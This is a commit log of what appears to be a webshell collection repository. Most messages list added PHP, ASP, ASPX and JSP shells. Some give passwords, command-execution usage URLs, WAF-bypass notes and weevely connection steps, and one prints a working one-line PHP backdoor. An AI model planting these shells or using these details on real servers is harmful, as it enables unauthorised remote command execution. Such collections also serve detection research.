Commit graph

225 commits

Author SHA1 Message Date
tennc
b289d60ee6 Create lnc.php 2015-06-06 11:49:02 +08:00
tennc
2c5b3b329b Create php1.php 2015-06-06 11:47:57 +08:00
tennc
0698f942f0 Update xiaom.php
password: -7
from : zone.wooyun.org
2015-05-29 11:46:25 +08:00
tennc
89d76f1452 Create xiaom.php
<?php assert($_POST[-7]);?>
2015-05-29 11:45:31 +08:00
tennc
6cf6bc6d5e Create wooyun2015052301.aspx
passwd:  -2
一句话木马
2015-05-23 17:08:04 +08:00
tennc
b5a24c76b0 Create as.ashx
example
as.ashx?x=ipconfig
from : zone.wooyun.org
2015-05-22 08:15:10 +08:00
tennc
24dbe2c788 Update README.md 2015-05-21 08:38:12 +08:00
tennc
1b499ce7bb Create jw.jspx
from wooyun.org
使用说明:http://xx.xx.xx/jw.jspx?pwd=sin&i=ls
有回显,带密码
2015-05-18 15:12:43 +08:00
tennc
6c708c5f1a Create jjw.jspx
from wooyun.org
使用说明:http://xx.xx.xx/jjw.jspx?i=ls
无回显
2015-05-18 15:11:11 +08:00
tennc
6652171538 Create xslt.php
from : http://drops.wooyun.org/tips/5799
2015-05-16 11:34:43 +08:00
tennc
69d5a36bbf Create xslt.aspx
from : http://drops.wooyun.org/tips/5799
2015-05-16 11:34:06 +08:00
tennc
43091bf604 Create xslt.asp
from: http://drops.wooyun.org/tips/5799
2015-05-16 11:33:15 +08:00
tennc
8da6ffdf3d update other shell repository @all3g 👍
url:https://github.com/all3g/fuzzdb/tree/master/web-backdoors
2015-05-15 14:40:50 +08:00
tennc
b144b25ef9 Create aspmuma.asp 2015-05-11 15:07:27 +08:00
tennc
b663b3acb6 Create biantai.php
hxxp://xxx.xxx.xxx/xx.php?PBbs=substr&UpB_=strtolower&PWWk=assert&xfrwA=0&Epd=要执行的php代码
2015-05-09 08:40:27 +08:00
tennc
aa27e0c457 Create cmd提权马.asp
用法:
http://192.168.1.108/moonshell.aspx?shell=C:\WINDOWS\system32\cmd.exe&sb=ipconfig
from: zone.wooyun.org
2015-05-08 09:46:11 +08:00
tennc
73ec37f7e7 Create bypass_safedog_03.asp
bypass caidao 接,密码:z
可能不过狗
bypass caidao 可能含有后门,除非菜刀是内部版或非公开版
from: zone.wooyun.org
2015-05-08 09:45:10 +08:00
tennc
bdc00aac7f Create bypass_safedog_02.asp
bypass caidao 接,密码:-7
可能不过狗
bypass caidao 可能含有后门,除非菜刀是内部版或非公开版
from: zone.wooyun.org
2015-05-08 09:43:40 +08:00
tennc
254323e616 Create bypass_safedog_01.asp
bypass caidao 接,密码:z
可能不过狗
bypass caidao 可能含有后门,除非菜刀是内部版或非公开版
from: zone.wooyun.org
2015-05-08 09:41:40 +08:00
tennc
6d1d34e674 add mssql.asp
from 4fec2938f9/backdoor/GetDatabase/mssql/MSSQL.asp
2015-04-28 09:18:26 +08:00
tennc
86a83d9fa7 update this shell repository @Ridter 👍
add https://github.com/Ridter/Pentest/tree/master/backdoor
2015-04-28 09:14:27 +08:00
tennc
a8c6b75250 add tuo.aspx from github.com/Ridter/Pentest
from : 4fec2938f9/backdoor/aspx/tuo.aspx
2015-04-28 09:10:35 +08:00
tennc
064326ef71 add mysql_1.php
from: c1d6f6741b/php/mysql_1.php
2015-04-28 09:08:03 +08:00
tennc
9a7eb37d92 Update README.md
add license  GPL v3
2015-04-17 09:34:33 +08:00
tennc
97e576aad2 add GPL v3 licenses 2015-04-17 09:32:33 +08:00
tennc
93b6a7d7e5 add public-shell repository @BDLeet 👍 2015-04-02 22:28:38 +08:00
tennc
835dee6509 add aioshell @cloudsec 👍 ✌️
A php webshell run under linux based webservers. v0.05

by wzt 2014,2015   wzt.wzt@gmail.com

url: https://github.com/cloudsec/aioshell
2015-03-30 21:14:27 +08:00
tennc
a32a469107 Merge pull request #6 from certego/master
add "Grasp" ASP webshell
2015-03-21 11:26:30 +08:00
Andrea De Pasquale
6feb434f76 grasp ASP webshell
https://www.virustotal.com/en/file/5767c1bb1b6d4391d8536b2c0736820fee8f7f1b0017c754a6ee7deccbc693b4/analysis/
2015-03-20 13:20:43 +01:00
tennc
8ff5620a5f add DAws @dotcppfile 👍
url:https://github.com/dotcppfile/DAws
2015-03-18 11:30:25 +08:00
tennc
131e784467 Create other.php
the password-hash:3087d04c8d7554eab1ea648abea06eab
decode other.php  is  other-decode.php
2015-03-18 10:42:53 +08:00
tennc
df40937a1f Create other-decode.php 2015-03-18 10:40:53 +08:00
tennc
027f2caded Update README.md 2015-03-17 10:32:13 +08:00
tennc
b61dc25f4a Update README.md
add download link
2015-03-17 10:31:59 +08:00
tennc
1386150b38 Update and rename php/b374k to php/b374k/b374k-3.2.3.min.php 2015-03-04 14:50:33 +08:00
tennc
e77d6cfe88 Update and rename php/b374k to php/b374k/b374k-3.2.3.php 2015-03-04 14:48:12 +08:00
tennc
78c88c5d5b add supers.php connect only with weevely
password: root
connect with weevely
bypass waf (safedog and some more )
weevely <url> password
weevely http://xxx.xxx/xxx.php root
2015-02-25 10:35:35 +08:00
tennc
538428e537 Update jweevely.md 2015-02-25 10:26:32 +08:00
tennc
07d9d50274 add @needle-wang jweevely
url: https://github.com/needle-wang/jweevely
2015-02-25 10:25:50 +08:00
tennc
3625f4d25a @tdifg add other webshell collect repository 2015-02-10 10:50:03 +08:00
tennc
b94a19187b @tdifg add your WebShell repository to me 2015-02-10 10:48:45 +08:00
tennc
567329613a Create 111.aspx
add  aspx shell
2015-02-04 09:27:37 +08:00
tennc
04a1ff3ad2 Merge pull request #5 from cnabcd/patch-1
add readme.txt  DarkBlade1.5.asp
2015-01-15 15:05:38 +08:00
abcd
bf2518ea25 readme.txt
在1.4基础上改进:
1、修正了打包非web根目录的一个问题
2、使用上传类
3、集成了80后黑客代表bin的saupload功能
4、sql操作增加导出数据到excel功能
5、集成陆羽黑客的有回显可反复执行的serv-u提权
6、数据库操作兼容非ms database
7、改进克隆、文件属性修改界面
8、sql sa权限实现用shell.adduser加用户
9、sql sa权限实现用xp_makecab替换文件
10、sql 注册表操作项目合并
11、应国际知名黑客bin要求,增加了sadownload功能
12、勉强算是解决了在开启编码的情况下后退再重复提交导致出错
13、兼容非IE浏览器

ps:访问请带参数 ?goaction=login
2015-01-13 07:05:37 +08:00
tennc
32e2ca2aa5 Update 强悍.php 2014-12-29 10:35:06 +08:00
tennc
04bb4ea2eb Update catjsp.md 2014-12-19 17:17:55 +08:00
tennc
a09547db35 add some cat for jsp shell
look http://javaweb.org/?p=1627
2014-12-19 17:15:36 +08:00
tennc
d18e132749 add cmd1.jsp
无密码、无回显,执行命令  http://site/url/cmd1.jsp?i=ls
2014-12-19 17:03:30 +08:00
tennc
abaa8b5d13 add cmd2.jsp
like http://site/url/cmd2.jsp?pwd=023&i=ls
2014-12-19 17:01:43 +08:00
tennc
5e4358b31b add asp shell 2014-11-21 09:50:49 +08:00